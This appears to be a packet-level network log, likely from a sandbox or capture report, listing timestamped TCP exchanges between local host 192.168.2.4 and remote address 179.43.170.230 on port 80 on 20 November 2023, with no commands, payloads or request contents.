Nov 20, 2023 05:21:12.787616968 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:12.787997007 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:12.788038969 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:12.789750099 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:12.789800882 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:12.790160894 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:12.790199041 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:12.791014910 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:12.791054010 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:12.791055918 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:12.791094065 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:12.792450905 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:12.792495966 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:12.792931080 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:12.792969942 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:12.792977095 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:12.793009043 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:12.793550968 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:12.793593884 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:12.793951988 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:12.793992043 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:12.795269966 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:12.795314074 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:12.796983957 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:12.797024965 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:12.797054052 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:12.797074080 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:12.798274994 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:12.798312902 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:12.798316002 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:12.798361063 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:12.805576086 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:12.805615902 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:12.805630922 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:12.805660009 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:12.806001902 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:12.806057930 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:12.806823969 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:12.806862116 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:12.806869030 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:12.806905985 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:12.811832905 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:12.811901093 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:12.812207937 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:12.812316895 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:12.813102961 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:12.813143969 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:12.813160896 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:12.813190937 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:12.814717054 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:12.814764023 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:12.816446066 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:12.816490889 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:12.816853046 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:12.816899061 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:12.818133116 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:12.818173885 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:12.818191051 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:12.818218946 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:12.821466923 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:12.821520090 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:12.821523905 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:12.821579933 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:12.821885109 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:12.821933031 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:12.824450016 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:12.824489117 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:12.824501038 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:12.824537992 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:12.827064991 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:12.827124119 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:12.828289032 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:12.828329086 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:12.828355074 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:12.828373909 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:12.833529949 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:12.833599091 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:12.833961964 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:12.834013939 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:12.835697889 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:12.835752964 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:12.836088896 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:12.836146116 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:12.836985111 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:12.837037086 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:12.837774992 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:12.837815046 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:12.837829113 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:12.837865114 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:12.838184118 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:12.838229895 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:12.838573933 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:12.838619947 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:12.843199968 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:12.843269110 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:12.844449997 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:12.844508886 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:12.844856977 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:12.844908953 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:12.844912052 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:12.844958067 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:12.845694065 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:12.845750093 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:12.953681946 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:12.953818083 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:12.954081059 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:12.954216957 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:12.954946995 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:12.955004930 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:12.957133055 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:12.957174063 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:12.957195044 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:12.957222939 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:12.958369970 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:12.958408117 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:12.958425045 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:12.958452940 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:12.959182024 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:12.959199905 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:12.959233999 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:12.959249973 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:12.960086107 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:12.960103035 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:12.960135937 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:12.960149050 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:12.960860014 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:12.960879087 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:12.960910082 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:12.960923910 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:12.962110043 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:12.962129116 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:12.962162971 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:12.962186098 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:12.963814974 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:12.963871002 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:12.964193106 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:12.964270115 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:12.965193033 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:12.965245008 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:12.965410948 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:12.965430021 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:12.965456009 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:12.965467930 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:12.966265917 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:12.966315985 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:12.967642069 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:12.967659950 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:12.967693090 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:12.967705011 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:12.967955112 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:12.968007088 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:12.971076965 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:12.971095085 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:12.971127987 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:12.971143961 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:12.972755909 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:12.972774982 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:12.972805023 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:12.972816944 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:12.973140001 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:12.973189116 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:12.974030018 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:12.974049091 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:12.974077940 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:12.974097013 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:12.974869013 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:12.974951982 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:12.975676060 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:12.975693941 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:12.975728035 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:12.975739956 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:12.977049112 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:12.977102041 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:12.978395939 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:12.978446960 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:12.979160070 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:12.979178905 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:12.979208946 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:12.979238987 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:12.979993105 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:12.980040073 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:12.982971907 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:12.982990026 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:12.983019114 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:12.983031034 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:12.984265089 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:12.984283924 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:12.984313011 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:12.984324932 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:12.990230083 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:12.990269899 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:12.990307093 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:12.990319014 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:12.992346048 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:12.992403984 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:12.993182898 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:12.993221045 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:12.993258953 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:12.993271112 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:12.995390892 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:12.995467901 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:12.997905970 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:12.997991085 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:12.997996092 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:12.998044014 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:13.000859976 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:13.000915051 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:13.000972986 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:13.001029015 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:13.002568960 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:13.002620935 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:13.002995014 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:13.003050089 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:13.005564928 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:13.005620003 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:13.005620956 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:13.005666018 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:13.005896091 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:13.005949020 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:13.006896973 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:13.006937981 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:13.006951094 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:13.006983042 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:13.007221937 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:13.007260084 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:13.007273912 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:13.007303953 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:13.008018017 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:13.008064985 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:13.008907080 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:13.008948088 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:13.008955956 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:13.008992910 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:13.009660959 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:13.009716988 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:13.009747982 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:13.009809017 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:13.011009932 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:13.011071920 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:13.012237072 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:13.012300014 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:13.012329102 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:13.012336016 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:13.012346029 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:13.012377024 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:13.013139009 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:13.013196945 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:13.014754057 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:13.014817953 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:13.020242929 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:13.020378113 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:13.023121119 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:13.023164988 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:13.023183107 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:13.023205042 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:13.024333000 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:13.024372101 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:13.024374962 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:13.024420023 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:13.025218964 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:13.025265932 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:13.026995897 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:13.027048111 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:13.027791977 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:13.027829885 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:13.027851105 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:13.027873039 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:13.028203011 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:13.028240919 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:13.028250933 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:13.028283119 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:13.029553890 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:13.029607058 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:13.029978037 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:13.030024052 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:13.030879021 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:13.030917883 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:13.030927896 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:13.030961990 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:13.031229973 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:13.031279087 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:13.032959938 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:13.033020973 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:13.034239054 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:13.034282923 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:13.034297943 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:13.034343958 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:13.035949945 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:13.035988092 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:13.036005974 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:13.036031008 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:13.036338091 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:13.036391020 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:13.037317991 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:13.037364006 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:13.043777943 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:13.043936968 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:13.044301987 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:13.044361115 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:13.050051928 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:13.050113916 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:13.051692009 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:13.051731110 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:13.051743984 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:13.051773071 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:13.052104950 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:13.052154064 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:13.056482077 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:13.056524038 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:13.056544065 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:13.056559086 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:13.057238102 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:13.057301044 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:13.058506012 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:13.058545113 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:13.058556080 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:13.058588982 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:13.058939934 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:13.058993101 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:13.061067104 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:13.061119080 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:13.062324047 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:13.062375069 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:13.064470053 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:13.064512014 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:13.064519882 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:13.064549923 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:13.064882040 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:13.064929962 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:13.072283030 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:13.072336912 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:13.073062897 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:13.073101044 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:13.073111057 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:13.073144913 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:13.073903084 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:13.073955059 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:13.083100080 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:13.083141088 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:13.083153009 CET	49731	80	192.168.2.4	179.43.170.230
